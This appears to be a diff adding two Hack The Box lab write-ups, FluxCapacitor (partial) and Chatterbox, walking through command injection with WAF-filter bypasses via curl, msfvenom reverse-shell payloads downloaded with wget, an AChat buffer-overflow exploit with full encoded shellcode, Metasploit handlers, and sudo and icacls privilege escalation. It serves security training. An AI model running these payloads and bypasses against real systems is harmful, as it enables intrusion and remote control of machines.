+ SecRule ARGS "@rx [;\(\)\|\`\<\>\&\$\*]" "id:2,phase:2,t:trim,t:urlDecode,block"
+ SecRule ARGS "@rx (user\.txt|root\.txt)" "id:3,phase:2,t:trim,t:urlDecode,block"
+ SecRule ARGS "@rx (\/.+\s+.*\/)" "id:4,phase:2,t:trim,t:urlDecode,block"
+ SecRule ARGS "@rx (\.\.)" "id:5,phase:2,t:trim,t:urlDecode,block"
+ SecRule ARGS "@rx (\?s)" "id:6,phase:2,t:trim,t:urlDecode,block"
+
+ SecRule ARGS:opt "@pmFromFile /usr/local/openresty/nginx/conf/unixcmd.txt" "id:99,phase:2,t:trim,t:urlDecode,block"
+ content_by_lua_block {
+ local opt = 'date'
+ if ngx.var.arg_opt then
+ opt = ngx.var.arg_opt
+ end
+
+ -- ngx.say("DEBUG: CMD='/home/themiddle/checksync "..opt.."'; bash -c $CMD 2>&1")
+
+ local handle = io.popen("CMD='/home/themiddle/checksync "..opt.."'; bash -c ${CMD} 2>&1")
+ local result = handle:read("*a")
+ handle:close()
+ ngx.say(result)
+
+
+
+those were the filtering rules and the command execution part, which reveals us the username "themiddle". Now to get access on the box we'll get inside by getting a reverse Xterm shell, However we need to make sure that our xserver is listening to tcp :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/FluxCapacitor]
+ → cat /etc/X11/xinit/xserverrc
+ #!/bin/sh
+
+ exec /usr/bin/X -nolisten tcp "$@"
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/FluxCapacitor]
+ → sudo nano /etc/X11/xinit/xserverrc
+ [sudo] password for nihilist:
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/FluxCapacitor]
+ → cat /etc/X11/xinit/xserverrc
+ #!/bin/sh
+
+ exec /usr/bin/X -listen tcp "$@"
+
+
+From there, we connect:
+
+_Terminal 1:_
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/FluxCapacitor]
+ → msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.14.11 LPORT=9001 -f elf index.html
+ [-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
+ [-] No arch selected, selecting arch: x86 from the payload
+ No encoder or badchars specified, outputting raw payload
+ Payload size: 68 bytes
+ Final size of elf file: 152 bytes
+ ELFT44 ��1���SCSj��f̀�Y�?̀Iy�h
+
+
+ h#)��fPQS���̀Rhn/shh//bi��RS��
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/FluxCapacitor]
+ → curl "http://10.10.10.69/sync?opt=' w\get 10.10.14.11 -P /tmp'"
+
+
+` _Terminal 2:_
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/FluxCapacitor]
+ → sudo python -m SimpleHTTPServer 80
+ Serving HTTP on 0.0.0.0 port 80 ...
+
+
+` _Terminal 1:_
+
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/FluxCapacitor]
+ → curl "http://10.10.10.69/sync?opt=' c\hmod +x /tmp/index.md'"
+
+
+
+` _Terminal 2:_
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → sudo nc -lvnp 9001
+ listening on [any] 9001 ...
+
+
+` _Terminal 1:_
+
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/FluxCapacitor]
+ → curl "http://10.10.10.69/sync?opt=' /tmp/index.md'"
+
+
+And we get a reverse shell ! However there is another way to get the user flag, which is by abusing the opt parameter on the sync page using curl :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/FluxCapacitor]
+ → curl "10.10.10.69/sync?opt=' c''at /home/FluxCapacitorIn''c/us''er.txt'"
+ b8XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And we have the user flag !
+
+## **Part 3 : Getting Root Access**
+
+Now in order to privesc we run the usual sudo -l
+
+
+ $ curl "http://10.10.10.69/sync?opt=' sudo -l'"
+
+ Matching Defaults entries for nobody on fluxcapacitor:
+ env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
+
+ User nobody may run the following commands on fluxcapacitor:
+ (ALL) ALL
+ (root) NOPASSWD: /home/themiddle/.monit
+
+
+we are hinted towards /home/themiddle/.monit so we print it out :
+
+
+ cat .monit
+
+ #!/bin/bash
+
+ if [ "$1" == "cmd" ]; then
+ echo "Trying to execute ${2}"
+ CMD=$(echo -n ${2} | base64 -d)
+ bash -c "$CMD"
+ fi
+
+
+And here we see that all we need to do is passing 2 arguements : the first one being "cmd" and the second one being a base64 encoded command. so we can run it, but for this example we'll show how it can be done remotely without even having access on the system by using curl just like for the user flag :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/FluxCapacitor]
+ → curl "10.10.10.69/sync?opt=' su''do /home/themiddle/.monit cmd $(echo cat /root/root.txt | base64)'"
+ Trying to execute Y2F0IC9yb290L3Jvb3QudHh0Cg==
+ bdXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+ bash: -c: option requires an argument
+
+
+
+And that's it ! we have been able to print out the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Medium/18.md b/Medium/18.md
new file mode 100644
index 0000000..628017a
--- /dev/null
+++ b/Medium/18.md
@@ -0,0 +1,561 @@
+# Chatterbox Writeup
+
+
+
+## Introduction :
+
+Chatterbox is a Medium windows box released back in January 2018
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Chatterbox]
+ → nmap -F 10.10.10.74
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-11 08:11 GMT
+ Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
+ Nmap done: 1 IP address (0 hosts up) scanned in 3.08 seconds
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Chatterbox]
+ → nmap -F 10.10.10.74 -Pn
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-11 08:12 GMT
+ Nmap scan report for 10.10.10.74
+ Host is up.
+ All 100 scanned ports on 10.10.10.74 are filtered
+
+ Nmap done: 1 IP address (1 host up) scanned in 21.16 seconds
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Chatterbox]
+ → nmap -F 10.10.10.74 --top-ports=30000 -vvv
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-11 08:12 GMT
+ Initiating Ping Scan at 08:12
+ Scanning 10.10.10.74 [2 ports]
+ Completed Ping Scan at 08:13, 3.00s elapsed (1 total hosts)
+ Nmap scan report for 10.10.10.74 [host down, received no-response]
+ Read data files from: /usr/bin/../share/nmap
+ Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
+ Nmap done: 1 IP address (0 hosts up) scanned in 3.07 seconds
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Chatterbox]
+ → nmap -F 10.10.10.74 --top-ports 30000 -vvv -Pn
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-11 08:13 GMT
+ Initiating Parallel DNS resolution of 1 host. at 08:13
+ Completed Parallel DNS resolution of 1 host. at 08:13, 0.01s elapsed
+ DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
+ Initiating Connect Scan at 08:13
+ Scanning 10.10.10.74 [8320 ports]
+ Connect Scan Timing: About 1.86% done; ETC: 08:40 (0:27:13 remaining)
+ Connect Scan Timing: About 6.91% done; ETC: 08:40 (0:25:49 remaining)
+ Connect Scan Timing: About 11.96% done; ETC: 08:40 (0:24:25 remaining)
+ Connect Scan Timing: About 17.01% done; ETC: 08:40 (0:23:01 remaining)
+ Discovered open port 9255/tcp on 10.10.10.74
+ Connect Scan Timing: About 39.73% done; ETC: 08:26 (0:07:55 remaining)
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Chatterbox]
+ → nmap -sCV -p9255 10.10.10.74 -Pn
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-11 08:18 GMT
+ Nmap scan report for 10.10.10.74
+ Host is up (0.099s latency).
+
+ PORT STATE SERVICE VERSION
+ 9255/tcp open http AChat chat system httpd
+ |_http-server-header: AChat
+ |_http-title: Site doesn't have a title.
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 8.00 seconds
+
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scans picked up port 9255 running the http service so let's investigate it :
+
+
+
+going to /achat we seem to get a binary file so let's download it locally and see what it says :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Chatterbox]
+ → file achat
+ achat: empty
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Chatterbox]
+ → r2 achat
+ [0x00000000]> aaa
+ [x] Analyze all flags starting with sym. and entry0 (aa)
+ [x] Analyze function calls (aac)
+ [x] find and analyze function preludes (aap)
+ [x] Analyze len bytes of instructions for references (aar)
+ [x] Check for objc references
+ [x] Check for vtables
+ [x] Type matching analysis for all functions (aaft)
+ [x] Propagate noreturn information
+ [x] Use -AA or aaaa to perform additional experimental analysis.
+ [0x00000000]> afl
+ [0x00000000]> vvv
+
+
+Seems like we have an empty application file, but let's see if radare2 shows us anything
+
+
+
+As expected we didn't get much from that. Let's run a quick searchsploit cmd with the "Achat" arguement:
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Chatterbox]
+ → searchsploit Achat
+ ------------------------------------------------------- -------------------------------
+ Exploit Title | Path
+ | (/usr/share/exploitdb/)
+ ------------------------------------------------------- -------------------------------
+ Achat 0.150 beta7 - Remote Buffer Overflow | exploits/windows/remote/36025.py
+ Achat 0.150 beta7 - Remote Buffer Overflow (Metasploit)| exploits/windows/remote/36056.rb
+ MataChat - 'input.php' Multiple Cross-Site Scripting Vu| exploits/php/webapps/32958.txt
+ Parachat 5.5 - Directory Traversal | exploits/php/webapps/24647.txt
+ ------------------------------------------------------- -------------------------------
+ Shellcodes: No Result
+
+
+Seems like we have a few interesting scripts to try, so let's pick up the first one :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Chatterbox]
+ → locate 36025.py
+ /usr/share/exploitdb/exploits/windows/remote/36025.py
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Chatterbox]
+ → cp /usr/share/exploitdb/exploits/windows/remote/36025.py .
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Chatterbox]
+ → nano 36025.py
+
+
+` 
+
+once we adapted the python script correctly we grep out the msfvenom command to edit it accordingly :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Chatterbox]
+ → grep msfvenom 36025.py
+ # msfvenom -a x86 --platform Windows -p windows/exec CMD=calc.exe -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
+
+
+So we edit it accordingly to generate the payload we need :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Chatterbox]
+ → msfvenom -a x86 --platform Windows -p windows/shell/reverse_tcp_allports LPORT=4444 LHOST=10.10.14.11 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
+
+
+Here we can see that we will generate a payload that will connect back to our ip (10.10.14.11) on port 9001 spawning the calc.exe application in the process. Note also that BufferRegister=EAX indicates at which register the jump call will be, the EAX register will contain the jump call that basically points at the BEGINNING of our buffer overflow payload.
+
+
+ Found 1 compatible encoders
+ Attempting to encode payload with 1 iterations of x86/unicode_mixed
+ x86/unicode_mixed succeeded with size 690 (iteration=0)
+ x86/unicode_mixed chosen with final size 690
+ Payload size: 690 bytes
+ Final size of python file: 3365 bytes
+ buf = b""
+ buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
+ buf += b"\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
+ buf += b"\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
+ buf += b"\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
+ buf += b"\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"
+ buf += b"\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
+ buf += b"\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
+ buf += b"\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"
+ buf += b"\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"
+ buf += b"\x47\x42\x39\x75\x34\x4a\x42\x49\x6c\x38\x68\x35\x32"
+ buf += b"\x59\x70\x4b\x50\x6d\x30\x53\x30\x63\x59\x47\x75\x4c"
+ buf += b"\x71\x49\x30\x63\x34\x62\x6b\x6e\x70\x4e\x50\x64\x4b"
+ buf += b"\x70\x52\x7a\x6c\x34\x4b\x42\x32\x4e\x34\x72\x6b\x62"
+ buf += b"\x52\x4f\x38\x4c\x4f\x55\x67\x6d\x7a\x4d\x56\x70\x31"
+ buf += b"\x49\x6f\x66\x4c\x4f\x4c\x30\x61\x51\x6c\x49\x72\x4e"
+ buf += b"\x4c\x6b\x70\x55\x71\x56\x6f\x6c\x4d\x4d\x31\x45\x77"
+ buf += b"\x67\x72\x38\x72\x51\x42\x70\x57\x44\x4b\x31\x42\x5a"
+ buf += b"\x70\x54\x4b\x50\x4a\x6d\x6c\x34\x4b\x6e\x6c\x5a\x71"
+ buf += b"\x51\x68\x77\x73\x4e\x68\x79\x71\x46\x71\x62\x31\x44"
+ buf += b"\x4b\x31\x49\x4f\x30\x6d\x31\x57\x63\x52\x6b\x71\x39"
+ buf += b"\x6e\x38\x6a\x43\x6f\x4a\x6d\x79\x44\x4b\x70\x34\x54"
+ buf += b"\x4b\x5a\x61\x57\x66\x4e\x51\x4b\x4f\x36\x4c\x69\x31"
+ buf += b"\x78\x4f\x5a\x6d\x39\x71\x68\x47\x4c\x78\x57\x70\x74"
+ buf += b"\x35\x58\x76\x49\x73\x33\x4d\x49\x68\x6f\x4b\x51\x6d"
+ buf += b"\x6f\x34\x33\x45\x48\x64\x42\x38\x54\x4b\x70\x58\x6f"
+ buf += b"\x34\x6d\x31\x48\x53\x72\x46\x64\x4b\x4a\x6c\x4e\x6b"
+ buf += b"\x62\x6b\x71\x48\x6d\x4c\x4b\x51\x57\x63\x52\x6b\x69"
+ buf += b"\x74\x52\x6b\x39\x71\x36\x70\x64\x49\x71\x34\x4f\x34"
+ buf += b"\x6b\x74\x51\x4b\x31\x4b\x33\x31\x6e\x79\x4f\x6a\x52"
+ buf += b"\x31\x69\x6f\x67\x70\x61\x4f\x4f\x6f\x6e\x7a\x54\x4b"
+ buf += b"\x4d\x42\x78\x6b\x64\x4d\x51\x4d\x62\x48\x6f\x43\x6d"
+ buf += b"\x62\x39\x70\x6b\x50\x32\x48\x31\x67\x73\x43\x4d\x62"
+ buf += b"\x31\x4f\x51\x44\x4f\x78\x4e\x6c\x30\x77\x4d\x56\x49"
+ buf += b"\x77\x39\x6f\x78\x55\x37\x48\x66\x30\x5a\x61\x49\x70"
+ buf += b"\x69\x70\x4f\x39\x45\x74\x4e\x74\x50\x50\x61\x58\x6b"
+ buf += b"\x79\x53\x50\x50\x6b\x4d\x30\x69\x6f\x66\x75\x62\x30"
+ buf += b"\x42\x30\x72\x30\x52\x30\x6f\x50\x70\x50\x61\x30\x6e"
+ buf += b"\x70\x72\x48\x79\x5a\x4a\x6f\x77\x6f\x57\x70\x49\x6f"
+ buf += b"\x68\x55\x63\x67\x53\x38\x39\x7a\x6c\x4a\x6c\x4e\x4a"
+ buf += b"\x6b\x32\x48\x4d\x32\x59\x70\x7a\x71\x51\x4c\x35\x39"
+ buf += b"\x38\x66\x30\x6a\x4c\x50\x42\x36\x71\x47\x73\x38\x42"
+ buf += b"\x79\x43\x75\x72\x54\x31\x51\x4b\x4f\x49\x45\x33\x55"
+ buf += b"\x65\x70\x62\x54\x7a\x6f\x51\x56\x64\x4b\x51\x36\x4c"
+ buf += b"\x42\x31\x76\x59\x50\x6f\x50\x45\x36\x67\x70\x50\x66"
+ buf += b"\x34\x49\x71\x36\x4d\x32\x68\x6b\x5a\x42\x61\x5a\x79"
+ buf += b"\x70\x32\x4a\x69\x74\x62\x36\x6e\x77\x33\x38\x59\x72"
+ buf += b"\x49\x49\x66\x68\x61\x4f\x59\x6f\x48\x55\x64\x4b\x50"
+ buf += b"\x36\x72\x4a\x6d\x70\x53\x38\x69\x70\x4c\x50\x4b\x50"
+ buf += b"\x59\x70\x6e\x76\x61\x5a\x4b\x50\x62\x48\x50\x58\x63"
+ buf += b"\x74\x6e\x73\x38\x65\x4b\x4f\x59\x45\x76\x33\x50\x53"
+ buf += b"\x30\x6a\x6b\x50\x71\x46\x30\x53\x50\x57\x53\x38\x59"
+ buf += b"\x72\x77\x69\x47\x58\x31\x4f\x69\x6f\x76\x75\x4b\x51"
+ buf += b"\x59\x33\x4b\x79\x77\x56\x74\x35\x58\x6e\x37\x53\x41"
+ buf += b"\x41"
+
+
+From there we edit the python script accordingly by pasting in the payload shellcode we generated:
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Chatterbox]
+ → nano 36025.py
+
+
+` 
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Chatterbox]
+ → nano 36025.py
+
+
+Once we're done, we set up a meterpreter handler listening on our port 4444 :
+
+
+ msf5 > use exploit/multi/handler
+ msf5 exploit(multi/handler) > set payload windows/shell/reverse_tcp_allports
+ payload => windows/shell/reverse_tcp_allports
+ msf5 exploit(multi/handler) > set lhost 10.10.14.11
+ lhost => 10.10.14.11
+ msf5 exploit(multi/handler) > set lport 4444
+ lport => 4444
+ msf5 exploit(multi/handler) > exploit
+
+ [*] Started reverse TCP handler on 10.10.14.11:4444
+
+
+Launch the exploit and catch the incoming reverse shell connection :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Chatterbox]
+ → python 36025.py
+ ---->{P00F}!
+
+
+
+ msf5 exploit(multi/handler) > exploit
+
+ [*] Started reverse TCP handler on 10.10.14.11:4444
+ [*] Encoded stage with x86/shikata_ga_nai
+ [*] Sending encoded stage (267 bytes) to 10.10.10.74
+ [*] Command shell session 1 opened (10.10.14.11:4444 -> 10.10.10.74:49157) at 2020-03-12 09:51:54 +0000
+
+ Microsoft Windows [Version 6.1.7601]
+ Copyright (c) 2009 Microsoft Corporation. All rights reserved.
+
+ C:\Windows\system32>systeminfo
+ systeminfo
+
+
+
+Looking at the systeminfo we see that the box has quite alot of hotfixes installed, so the privilege escalation may not be as trivial as we think :
+
+
+ Host Name: CHATTERBOX
+ OS Name: Microsoft Windows 7 Professional
+ OS Version: 6.1.7601 Service Pack 1 Build 7601
+ OS Manufacturer: Microsoft Corporation
+ OS Configuration: Standalone Workstation
+ OS Build Type: Multiprocessor Free
+ Registered Owner: Windows User
+ Registered Organization:
+ Product ID: 00371-223-0897461-86794
+ Original Install Date: 12/10/2017, 9:18:19 AM
+ System Boot Time: 3/12/2020, 5:52:17 AM
+ System Manufacturer: VMware, Inc.
+ System Model: VMware Virtual Platform
+ System Type: X86-based PC
+ Processor(s): 2 Processor(s) Installed.
+ [01]: x64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
+ [02]: x64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
+ BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
+ Windows Directory: C:\Windows
+ System Directory: C:\Windows\system32
+ Boot Device: \Device\HarddiskVolume1
+ System Locale: en-us;English (United States)
+ Input Locale: en-us;English (United States)
+ Time Zone: (UTC-05:00) Eastern Time (US & Canada)
+ Total Physical Memory: 2,047 MB
+ Available Physical Memory: 1,402 MB
+ Virtual Memory: Max Size: 4,095 MB
+ Virtual Memory: Available: 3,423 MB
+ Virtual Memory: In Use: 672 MB
+ Page File Location(s): C:\pagefile.sys
+ Domain: WORKGROUP
+ Logon Server: \\CHATTERBOX
+ Hotfix(s): 208 Hotfix(s) Installed.
+ [01]: KB2849697
+ [02]: KB2849696
+ [03]: KB2841134
+ [04]: KB2670838
+ [05]: KB2830477
+ [06]: KB2592687
+ [07]: KB2479943
+ [08]: KB2491683
+ [09]: KB2506212
+ [10]: KB2506928
+ [11]: KB2509553
+ [12]: KB2532531
+ [13]: KB2533552
+ [14]: KB2533623
+
+ [...]
+
+ [206]: KB976902
+ [207]: KB982018
+ [208]: KB4054518
+ Network Card(s): 1 NIC(s) Installed.
+ [01]: Intel(R) PRO/1000 MT Network Connection
+ Connection Name: Local Area Connection
+ DHCP Enabled: No
+ IP address(es)
+ [01]: 10.10.10.74
+
+
+now let's first upgrade our multi handler to a meterpreter shell :
+
+
+ C:\Windows\system32>^Z
+ Background session 1? [y/N] y
+ msf5 exploit(multi/handler) > use post/multi/manage/shell_to_meterpreter
+ msf5 post(multi/manage/shell_to_meterpreter) > set session 1
+ session => 1
+ msf5 post(multi/manage/shell_to_meterpreter) > set lhost 10.10.14.11
+ lhost => 10.10.14.11
+ msf5 post(multi/manage/shell_to_meterpreter) > set lport 8888
+ lport => 8888
+ msf5 post(multi/manage/shell_to_meterpreter) > exploit
+
+ [*] Upgrading session ID: 1
+ [*] Starting exploit/multi/handler
+ [*] Started reverse TCP handler on 10.10.14.11:8888
+
+
+Wait a bit for it to migrate :
+
+
+ [*] Started reverse TCP handler on 10.10.14.11:8888
+ [*] Post module execution completed
+ msf5 post(multi/manage/shell_to_meterpreter) >
+ [*] Sending stage (180291 bytes) to 10.10.10.74
+ [*] Meterpreter session 2 opened (10.10.14.11:8888 -> 10.10.10.74:49158) at 2020-03-12 09:55:49 +0000
+ [*] Stopping exploit/multi/handler
+
+
+
+And we see that it opened session 2 for us, so migrate into our second session :
+
+
+ msf5 post(multi/manage/shell_to_meterpreter) > sessions -i 2
+ [*] Starting interaction with 2...
+
+ meterpreter > shell
+ Process 4008 created.
+ Channel 1 created.
+ Microsoft Windows [Version 6.1.7601]
+ Copyright (c) 2009 Microsoft Corporation. All rights reserved.
+
+ C:\Windows\system32>whoami
+ whoami
+ chatterbox\alfred
+
+
+Looks like we are logged in as alfred, so let's go ahead and print out his user.txt flag :
+
+
+ C:\Windows\system32>cd ..
+ cdcd ..
+
+ C:\Windows> ..
+ cd ..
+
+ C:\>dir
+ dir
+ Volume in drive C has no label.
+ Volume Serial Number is 9034-6528
+
+ Directory of C:\
+
+ 06/10/2009 05:42 PM 24 autoexec.bat
+ 06/10/2009 05:42 PM 10 config.sys
+ 07/13/2009 10:37 PM <****DIR> PerfLogs
+ 12/10/2017 02:35 PM <****DIR> Program Files
+ 12/10/2017 10:21 AM <****DIR> Users
+ 12/10/2017 07:42 PM <****DIR> Windows
+ 2 File(s) 34 bytes
+ 4 Dir(s) 17,930,084,352 bytes free
+
+ C:\>cd Users
+ cd Users
+
+ C:\Users>dir
+ dir
+ Volume in drive C has no label.
+ Volume Serial Number is 9034-6528
+
+ Directory of C:\Users
+
+ 12/10/2017 10:21 AM <****DIR> .
+ 12/10/2017 10:21 AM <****DIR> ..
+ 12/10/2017 02:34 PM <****DIR> Administrator
+ 12/10/2017 10:18 AM <****DIR> Alfred
+ 04/11/2011 10:21 PM <****DIR> Public
+ 0 File(s) 0 bytes
+ 5 Dir(s) 17,930,084,352 bytes free
+
+ C:\Users>cd Alfred
+ cd Alfred
+
+ C:\Users\Alfred>dir
+ dir
+ Volume in drive C has no label.
+ Volume Serial Number is 9034-6528
+
+ Directory of C:\Users\Alfred
+
+ 12/10/2017 10:18 AM <****DIR> .
+ 12/10/2017 10:18 AM <****DIR> ..
+ 12/10/2017 01:05 PM <****DIR> Contacts
+ 12/10/2017 07:50 PM <****DIR> Desktop
+ 12/10/2017 01:05 PM <****DIR> Documents
+ 12/10/2017 01:25 PM <****DIR> Downloads
+ 12/10/2017 01:05 PM <****DIR> Favorites
+ 12/10/2017 01:05 PM <****DIR> Links
+ 12/10/2017 01:05 PM <****DIR> Music
+ 12/10/2017 01:05 PM <****DIR> Pictures
+ 12/10/2017 01:05 PM <****DIR> Saved Games
+ 12/10/2017 01:05 PM <****DIR> Searches
+ 12/10/2017 01:05 PM <****DIR> Videos
+ 0 File(s) 0 bytes
+ 13 Dir(s) 17,930,084,352 bytes free
+
+ C:\Users\Alfred>cd Desktop
+ cd Desktop
+
+ C:\Users\Alfred\Desktop>dir
+ dir
+ Volume in drive C has no label.
+ Volume Serial Number is 9034-6528
+
+ Directory of C:\Users\Alfred\Desktop
+
+ 12/10/2017 07:50 PM <****DIR> .
+ 12/10/2017 07:50 PM <****DIR> ..
+ 12/10/2017 07:50 PM 32 user.txt
+ 1 File(s) 32 bytes
+ 2 Dir(s) 17,930,084,352 bytes free
+
+ C:\Users\Alfred\Desktop>type user.txt
+ type user.txt
+ 72XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+And that's it ! we have been able to print out the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Getting the Administrator flag is preety straightforward since we can already navigate into the Administrator folder:
+
+
+ C:\Users\Alfred\Desktop>cd ../..
+ cd ../..
+
+ C:\Users>cd Administrator
+ cd Administrator
+
+ C:\Users\Administrator>dir
+ dir
+ Volume in drive C has no label.
+ Volume Serial Number is 9034-6528
+
+ Directory of C:\Users\Administrator
+
+ 12/10/2017 02:34 PM <****DIR> .
+ 12/10/2017 02:34 PM <****DIR> ..
+ 12/10/2017 07:08 PM <****DIR> Contacts
+ 12/10/2017 07:50 PM <****DIR> Desktop
+ 12/10/2017 07:08 PM <****DIR> Documents
+ 12/10/2017 07:08 PM <****DIR> Downloads
+ 12/10/2017 07:08 PM <****DIR> Favorites
+ 12/10/2017 07:08 PM <****DIR> Links
+ 12/10/2017 07:08 PM <****DIR> Music
+ 12/10/2017 07:08 PM <****DIR> Pictures
+ 12/10/2017 07:08 PM <****DIR> Saved Games
+ 12/10/2017 07:08 PM <****DIR> Searches
+ 12/10/2017 07:08 PM <****DIR> Videos
+ 0 File(s) 0 bytes
+ 13 Dir(s) 18,025,164,800 bytes free
+
+ C:\Users\Administrator>cd Desktop
+ cd Desktop
+
+ C:\Users\Administrator\Desktop>dir
+ dir
+ Volume in drive C has no label.
+ Volume Serial Number is 9034-6528
+
+ Directory of C:\Users\Administrator\Desktop
+
+ 12/10/2017 07:50 PM <****DIR> .
+ 12/10/2017 07:50 PM <****DIR> ..
+ 12/10/2017 07:50 PM 32 root.txt
+ 1 File(s) 32 bytes
+ 2 Dir(s) 18,025,164,800 bytes free
+
+ C:\Users\Administrator\Desktop>type root.txt
+ type root.txt
+ Access is denied.
+
+As expected we can't print out the Administrator's root flag. so we check the permissions since it is quite odd to be able to navigate into his folder as the user alfred:
+
+
+ C:\Users\Administrator\Desktop>cacls C:\Users\Administrator\Desktop
+ cacls C:\Users\Administrator\Desktop
+ C:\Users\Administrator\Desktop NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
+ CHATTERBOX\Administrator:(OI)(CI)(ID)F
+ BUILTIN\Administrators:(OI)(CI)(ID)F
+ CHATTERBOX\Alfred:(OI)(CI)(ID)F
+
+
+
+Basically here we see that we already have the privileges we need to modify the permissions of all files and directories under Admin's directory. And since we are on a Windows 7 Box there is a command line tool to change file permissions :
+
+
+ C:\Users\Administrator\Desktop>ICACLS root.txt /grant "Users":F
+ ICACLS root.txt /grant "Users":F
+ processed file: root.txt
+ Successfully processed 1 files; Failed processing 0 files
+
+ C:\Users\Administrator\Desktop>type root.txt
+ type root.txt
+ a6XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And as you can see we have been able to print out the root flag !
+
+## **Conclusion**
+
